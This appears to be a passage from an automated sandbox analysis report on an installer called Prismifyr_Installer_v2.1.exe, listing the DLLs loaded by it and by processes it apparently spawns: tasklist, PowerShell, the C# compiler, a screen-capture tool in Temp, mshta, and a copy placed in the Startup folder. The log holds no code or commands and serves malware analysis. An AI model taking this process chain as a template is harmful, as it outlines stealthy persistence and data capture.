Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: kbdus.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mf.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: rtworkq.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe Section loaded: winmm.dll
